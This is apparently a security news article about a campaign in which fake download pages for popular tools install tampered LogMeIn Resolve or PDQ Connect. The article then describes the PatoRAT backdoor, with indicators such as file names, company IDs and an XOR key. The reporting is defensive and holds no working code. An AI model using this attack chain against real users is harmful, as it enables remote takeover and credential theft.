Cybercriminals are now exploiting remote monitoring and management tools to spread dangerous malware while avoiding detection by security systems.
The attack campaign targets users who download what appears to be popular software, such as Notepad++, 7-Zip, or ChatGPT, from fake websites.
Instead of getting the real program, victims unknowingly install LogMeIn Resolve or PDQ Connect, which gives hackers complete control over their computers.
The attack begins when users visit websites that appear to be official download pages for trusted utilities.
These fake pages offer downloads for programs such as notepad++.exe, 7-zip.exe, winrar.exe, and even chatgpt.exe.
.webp "Hackers Exploiting RMM Tools LogMeIn and PDQ Connect to Deploy Malware as a Normal Program 2")
When someone clicks the download button, they receive a modified version of LogMeIn Resolve that connects directly to the attacker’s command server.
The malicious installer files have been found using names like Microsoft.exe, OpenAI.exe, and windows12_installer.exe to trick users into thinking they are legitimate.
ASEC security researchers identified this campaign after investigating unusual activity involving RMM tools in Korea.
They discovered that three different threat actors were behind the attacks, each using unique company identification numbers embedded in the LogMeIn configuration files.
The researchers found company IDs 8347338797131280000, 1995653637248070000, and 4586548334491120000 being used to control infected systems.
Once the fake LogMeIn or PDQ Connect software gets installed, hackers can run PowerShell commands remotely to download additional malware.
The attackers use these tools to drop a backdoor called PatoRAT onto victim computers. This malware, developed in Delphi, includes Portuguese-language strings in its code, suggesting the developers may be from Portuguese-speaking regions.
How the Malware Gains Control
PatoRAT operates by establishing a connection to command-and-control servers and sending detailed information about the infected computer.
The malware collects the computer name, username, operating system details, memory usage, screen resolution, and active windows.
This data gets encrypted using a simple XOR cipher with the key 0xAA and stored in the resource section under “APPCONFIG”.
The backdoor supports dangerous functions, including mouse control, screen capture, keylogging, stealing browser passwords, and even installing port-forwarding tools.
Security teams recommend downloading software only from official websites, checking digital certificates, and keeping antivirus programs up to date to prevent these attacks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
